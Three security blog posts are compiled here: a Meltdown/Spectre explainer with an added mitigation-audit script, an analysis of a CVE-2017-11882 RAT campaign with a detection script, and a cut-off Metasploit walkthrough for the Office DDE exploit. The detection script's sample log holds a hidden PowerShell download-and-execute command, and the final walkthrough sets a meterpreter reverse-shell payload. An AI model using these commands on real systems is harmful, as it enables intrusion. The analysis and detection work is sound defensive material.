Meltdown and Spectre vulnerabilities: What you need to know

Two major security vulnerabilities in processors, dubbed Meltdown and Spectre, were disclosed earlier this week by Google’s Project Zero team. Both allow attackers to gain unauthorized access to sensitive information in memory; they represent a new class of microarchitectural attacks that abuse processor performance-optimization features to bypass built-in security mechanisms.
Meltdown exploits the out-of-order execution feature of modern processors, allowing user-level programs to access kernel memory using processor caches as covert side channels. This is specific to the way out-of-order execution is implemented in the processors. This vulnerability has been assigned CVE-2017-5754.
Spectre exploits the speculative execution feature present in almost all processors in use today. Two variants of Spectre are known; they differ in what is used to induce erroneous speculative execution. The first variant triggers it through a bounds check bypass and has been assigned CVE-2017-5753. The second variant uses branch target injection to the same effect and has been assigned CVE-2017-5715.
What is vulnerable?
Meltdown has the potential to affect every Intel processor that supports out-of-order execution; essentially all Intel processors since 1995. At the moment it is unclear if AMD and ARM processors are affected by Meltdown. Meltdown exploits the shared kernel-space mapping in the user-space virtual memory. Mitigating this vulnerability involves a technique known as Kernel Page Table Isolation (KPTI), which improves the isolation between kernel-space and user-space memory.
Spectre, on the other hand, affects almost every system in existence: desktops, laptops, cloud servers, tablets, and smartphones. Spectre has been exploited successfully on Intel, AMD, ARM, System Z, and Power 9 processors, among others. There is no single fix for this vulnerability, as it is at an architectural level, and mitigation requires fixes at each application level. Exploitation through JavaScript is also possible.
Meltdown vulnerability impact:
Read arbitrary kernel memory from user space applications
Fully virtualized machines are not affected (guest user space application cannot read host user/kernel space memory)
Hypervisor escape is possible in paravirtualized environments (Xen, Docker, etc.)
Sensitive information disclosure and privilege escalation attacks, as the dumped memory may contain password hashes, private keys, etc.
Spectre vulnerability impact:
Theoretically allows arbitrary access to the entire memory space
Works across Virtual Machines
A practical PoC for user-space to user-space attacks exists at the moment
Harder to exploit than Meltdown
Leaking user-space module addresses and thus bypassing ASLR for further attacks is possible (remote code execution)
What may be impacted?
PCs, laptops, servers, virtualization software, cloud servers, and so on, are all impacted if they are running a vulnerable processor.
Meltdown: All modern Intel x86 processors are vulnerable. Exploitation is theoretically possible on AMD and ARM, but not yet practically achieved.
Spectre: Intel, ARM, AMD, System Z, and Power 9 processors.
Is the Zscaler cloud infrastructure vulnerable?
Zscaler runs large parts of its cloud software on dedicated bare metal and does not share processors or memory with anyone else. This safeguards Zscaler infrastructure from attacks that can originate from foreign applications that may try to escape the virtual environment and access our memory regions. The attack can only be executed locally with an attacker running malicious code on the same hardware. Since our execution environment is highly guarded and closed, attackers cannot gain access to launch malicious code. Nonetheless, our cloud operations team is actively working on applying necessary patches after carefully evaluating their impact on performance and stability.
Zscaler customers running virtualized private components on their infrastructure should immediately update their hosts so as to prevent VM escape, in which another guest on the same host may browse memory regions used by other virtualized components. Only software updates to the hosts can protect the guests from these exploits, as a guest OS update will not suffice to protect against another compromised guest. It is the customer’s responsibility to apply updates relevant to their infrastructure.
The Zscaler official trust post on this issue can be found here.
Zscaler security coverage for exploitation
We have deployed advanced threat signatures to detect some of the known JavaScript-based exploit POCs.
Advanced threat signatures: JS.Spectre.gen (browser exploit)
We are actively working on deploying an assembly-level detection for the exploitation technique involved in both the Meltdown and Spectre attacks. There are no active in-the-wild (ITW) exploit attempts of Meltdown or Spectre that Zscaler ThreatLabZ is currently aware of, but we will continue to actively monitor and ensure coverage for our customers.
Mitigation
Zscaler ThreatLabZ highly recommends applying both operating system and application-level patches to safeguard systems against these vulnerabilities.
OS-level patches currently available
FreeBSD patches being worked on: (https://www.freebsd.org/news/newsflash.html#event20180104:01)
Apple Mitigations (https://support.apple.com/en-us/HT208394)
Microsoft Advisory (https://support.microsoft.com/en-us/help/4073119/protect-against-speculative-execution-side-channel-vulnerabilities-in) Note: A small number of anti-virus applications performing unsupported calls to Windows Kernel memory are causing Blue Screen of Death (BSOD) after the use of this patch, so if you didn’t receive the latest Windows security update, you may need to update the AV application first.
Browser patches
Chrome has offered a mitigation since Chrome 63 (released Dec 15): enabling the Site Isolation feature. A comprehensive fix will be available in Chrome 64 (releasing Jan 23)
Firefox has short-term mitigations available from version 57 (released November)
Microsoft Edge and IE updates are available along with the Windows patch
Virtualization application-level patches
VMware (https://www.vmware.com/us/security/advisories/VMSA-2018-0002.html)
XEN (https://xenbits.xen.org/xsa/advisory-254.html)
Citrix (https://support.citrix.com/article/CTX231399)
Recommendation for cloud apps
Amazon AWS (https://aws.amazon.com/de/security/security-bulletins/AWS-2018-013/)
Microsoft Azure (https://azure.microsoft.com/en-us/blog/securing-azure-customers-from-cpu-vulnerability/)
Google Cloud (https://support.google.com/faqs/answer/7622138)
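As an added example (not part of the Zscaler post), the following Python script checks the OS-level mitigation status on a Linux host. It reads the per-issue status files that patched Linux kernels expose under /sys/devices/system/cpu/vulnerabilities/ and reports, for the three CVEs above, whether the kernel says the issue is mitigated, not applicable, still vulnerable, or cannot be verified. The file names, the status-line format and the sample strings are assumptions about that kernel interface; a missing directory is reported as unknown rather than safe, because an unpatched kernel has no such files at all.

```python
"""Audit Linux speculative-execution mitigation status via sysfs.

Added example, not code from the original post. Patched Linux kernels
expose one file per issue under /sys/devices/system/cpu/vulnerabilities/
(meltdown, spectre_v1, spectre_v2); each holds a one-line status string
such as "Mitigation: PTI", "Vulnerable" or "Not affected" (assumed format).
"""
import os
import sys

# The three issues discussed in the post, keyed by the kernel's file names.
ISSUES = {
    "meltdown": "CVE-2017-5754",
    "spectre_v1": "CVE-2017-5753",
    "spectre_v2": "CVE-2017-5715",
}

SYSFS_DIR = "/sys/devices/system/cpu/vulnerabilities"


def classify(status):
    """Map one kernel status line to (verdict, detail).

    verdict is one of 'not_affected', 'mitigated', 'vulnerable', 'unknown'.
    A line such as "Vulnerable: <partial measure>" is still 'vulnerable'.
    """
    s = status.strip()
    low = s.lower()
    if low.startswith("not affected"):
        return ("not_affected", s)
    if low.startswith("mitigation:"):
        return ("mitigated", s.split(":", 1)[1].strip())
    if low.startswith("vulnerable"):
        detail = s.split(":", 1)[1].strip() if ":" in s else ""
        return ("vulnerable", detail)
    return ("unknown", s)


def audit(sysfs_dir=SYSFS_DIR):
    """Return {issue: (cve, verdict, detail)} for every issue in ISSUES.

    A kernel predating the interface has no status files; that is reported
    as 'unknown' for every issue rather than treated as safe.
    """
    results = {}
    for name, cve in ISSUES.items():
        path = os.path.join(sysfs_dir, name)
        try:
            with open(path) as fh:
                verdict, detail = classify(fh.read())
        except OSError:
            verdict, detail = ("unknown", "no status file (kernel lacks the interface?)")
        results[name] = (cve, verdict, detail)
    return results


def needs_action(results):
    """Sorted names of issues that are still vulnerable or could not be verified."""
    return sorted(name for name, (_cve, verdict, _detail) in results.items()
                  if verdict in ("vulnerable", "unknown"))


# Constructed sample lines in the assumed kernel format, for offline runs.
SAMPLE_STATUS = {
    "meltdown": "Mitigation: PTI\n",
    "spectre_v1": "Vulnerable\n",
    "spectre_v2": "Not affected\n",
}


if __name__ == "__main__":
    # Usage: python audit_mitigations.py [directory]; defaults to the live sysfs path.
    target = sys.argv[1] if len(sys.argv) > 1 else SYSFS_DIR
    report = audit(target)
    for name, (cve, verdict, detail) in report.items():
        print(f"{name:10} {cve}  {verdict:12} {detail}")
    pending = needs_action(report)
    print("action needed:", ", ".join(pending) if pending else "none")
```

Run it on each Linux host after patching; any issue listed under "action needed" either still lacks a mitigation or is running a kernel too old to report one, and both cases deserve a follow-up rather than being assumed safe.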
Conclusion
For those of us in security, 2017 will be remembered for three major ransomware outbreaks and the Equifax data breach. And with such a significant security issue tagged within the first week of the year, 2018 promises to be challenging for the security and tech industry.
While we are not aware of any exploit attempts for these vulnerabilities in the wild, it is only a matter of time before we start seeing them. We urge everyone to apply the available security patches.
Zscaler ThreatLabZ will continue to monitor and ensure coverage for any in-the-wild exploit attempts targeting these vulnerabilities.

Link: https://www.zscaler.com/blogs/research/meltdown-and-spectre-vulnerabilities-what-you-need-know

CVE-2017-11882 serving RAT and encrypted phishing campaign

Introduction
Malicious documents remain one of the most popular vectors for cybercriminals to deliver malware payloads on a user’s system. While we continue to see many types of VBA macro-based malware, there has been an increasing trend in malicious documents using the DDE protocol for delivering malware executables, which we wrote about last month. Microsoft released a security update last week that should significantly reduce the number of DDE-based attacks:
“Microsoft has released an update for Microsoft Office that provides enhanced security as a defense-in-depth measure. The update disables the Dynamic Update Exchange protocol (DDE) in all supported editions of Microsoft Word." – Microsoft Security Advisory
Zscaler ThreatLabZ has been tracking a new vector involving malicious RTF document files weaponized with the recently disclosed Microsoft memory corruption vulnerability, CVE-2017-11882. In this blog, we will review a recent campaign leveraging this exploit and also share insights on encrypted phishing campaigns.
Infection cycle
In our research into this new exploit, we encountered spam phishing emails containing a malicious document attachment that leads to a Remote Access Trojan (RAT) and an encrypted phishing page.
The complete workflow of this campaign is shown below:
Fig 1: Workflow
The malware is received by the victim in a phishing email with a password-protected archive as the attachment.
An example of one such phishing email can be seen below:
Fig 2: Phishing scam email
The attachment is a password-protected ZIP file, which prevents auto-analysis systems from extracting and analyzing malicious files.
After extracting the ZIP file with the password given in the email, we are presented with an RTF document file. This RTF file exploits the CVE-2017-11882 vulnerability in Microsoft Office software to execute malicious code. Using this vulnerability, the attacker can install malware, access data, or create a new account with full access rights.
Once the document is opened, it shows a plain document to the user. However, in the background it downloads and executes a RAT; as it does, it shows the phishing email content to the user, which leads to a phishing site.
The malicious RTF document file is shown below.
Fig 3: After HEX-to-ASCII conversion.
The RTF file contains a link to "note", an HTML application that is fetched and executed by mshta.exe.
In the header section of note.hta, there is VBScript code that is executed when the file is loaded.
Fig 4: Header section of note.hta
After decoding, the code looks like this.
Fig 5: Decoded PowerShell code inside VBScript of note.hta
The VBScript in note.hta creates a hidden PowerShell process, which downloads a malware executable, stores it in the %TEMP% directory as clear.exe, and executes it.
clear.exe is a Python script packaged into a Windows executable.
After reverse engineering clear.exe, we recover the malicious Python script, which looks like a RAT client.
The RAT client connects with the Command & Control (C&C) server IP 197.200.145[.]178 on port 2016.
It supports a handful of tasks that are executed when the C&C server sends a command.
Fig 6: RAT commands (clear.exe)
RAT C&C commands supported:
Kill – kill client connection
Selfdestruct – kill client connection and remove traces of exploit
Quit – close socket and connection
Persistence – make RAT client persistent in system
Scan – scan TCP ports
Survey – run a system survey
Cat
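The delivery chain described above (an RTF exploiting CVE-2017-11882, mshta.exe fetching a remote .hta, a hidden PowerShell download, and clear.exe run from %TEMP%) leaves a recognisable trail in endpoint process-creation telemetry. The following Python detection logic is an added example, not code from the Zscaler post: the record format, field names, IP addresses and log lines are constructed for the example, and eqnedt32.exe is listed as a possible parent process because CVE-2017-11882 is a bug in the Office Equation Editor (a fact not stated in the post).

```python
"""Flag the RTF -> mshta -> hidden PowerShell -> %TEMP% executable chain.

Added example, not code from the original post. Process-creation records
are in a constructed Sysmon-like line format:
  <timestamp> parent=<parent image> image=<image> cmd="<command line>"
"""
import re
from collections import namedtuple

Event = namedtuple("Event", "ts parent image cmdline")

LINE_RE = re.compile(r'^(\S+) parent=(\S+) image=(\S+) cmd="(.*)"$')

# Office hosts plus eqnedt32.exe, the Equation Editor that CVE-2017-11882 targets
# (known fact, not from the post).
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}

# Each rule is (name, predicate over an Event). Predicates may return a Match.
RULES = [
    ("office_spawns_mshta",
     lambda e: e.parent in OFFICE and e.image == "mshta.exe"),
    ("mshta_remote_hta",
     lambda e: e.image == "mshta.exe"
     and re.search(r"https?://\S+\.hta\b", e.cmdline, re.I)),
    ("hidden_powershell_download",
     lambda e: e.image == "powershell.exe"
     and re.search(r"-w(indowstyle)?\s+hidden", e.cmdline, re.I)
     and re.search(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b",
                   e.cmdline, re.I)),
    ("exe_from_temp",
     lambda e: e.parent == "powershell.exe"
     and re.search(r"\\temp\\[^\\]+\.exe", e.cmdline, re.I)),
]


def parse(text):
    """Turn the constructed log text into Event tuples (images lower-cased)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError("unrecognised record: " + line)
        ts, parent, image, cmd = m.groups()
        events.append(Event(ts, parent.lower(), image.lower(), cmd))
    return events


def analyze(text):
    """Return [(ts, image, [rule names])] for every event that hits a rule."""
    flagged = []
    for e in parse(text):
        rules = [name for name, test in RULES if test(e)]
        if rules:
            flagged.append((e.ts, e.image, rules))
    return flagged


def is_delivery_chain(flagged):
    """True when an Office->mshta launch is followed by a download or %TEMP% run."""
    seen = {r for _ts, _img, rules in flagged for r in rules}
    return ("office_spawns_mshta" in seen
            and bool(seen & {"hidden_powershell_download", "exe_from_temp"}))


# Constructed sample telemetry (documentation-range IP, fictitious user).
SAMPLE_LOG = r"""
2017-12-05T10:01:20Z parent=explorer.exe image=winword.exe cmd="WINWORD.EXE C:\Users\victim\Downloads\invoice.rtf"
2017-12-05T10:01:22Z parent=winword.exe image=mshta.exe cmd="mshta.exe http://198.51.100.7/note.hta"
2017-12-05T10:01:23Z parent=mshta.exe image=powershell.exe cmd="powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://198.51.100.7/clear.exe','C:\Users\victim\AppData\Local\Temp\clear.exe')"
2017-12-05T10:01:25Z parent=powershell.exe image=clear.exe cmd="C:\Users\victim\AppData\Local\Temp\clear.exe"
2017-12-05T10:02:00Z parent=explorer.exe image=notepad.exe cmd="notepad.exe C:\Users\victim\notes.txt"
"""


if __name__ == "__main__":
    hits = analyze(SAMPLE_LOG)
    for ts, image, rules in hits:
        print(ts, image, ", ".join(rules))
    print("delivery chain detected:", is_delivery_chain(hits))
```

The individual rules are deliberately narrow (an Office parent for mshta.exe, a remote .hta URL, the hidden window plus a download cmdlet, an executable started from %TEMP% by PowerShell), and the chain verdict requires two stages so that a single noisy hit does not page anyone; in practice the rules map onto Sysmon Event ID 1 fields (ParentImage, Image, CommandLine) in whatever SIEM holds the telemetry.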

Link: https://www.zscaler.com/blogs/research/cve-2017-11882-serving-rat-and-encrypted-phishing-campaign

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Move module into framework
mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
Open Metasploit and load exploit
msfconsole
reload_all
use exploit/windows/dde_delivery
Set the server host
set SRVHOST 192.168.1.10
Choose payload and run it
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 443
exploit
Copy-paste the code into any Word/Excel document. Open Word/Excel. Create a new …

Link: http://securityblog.gr/4478/exploit-microsoft-office-dde-command-execution-vulnerability/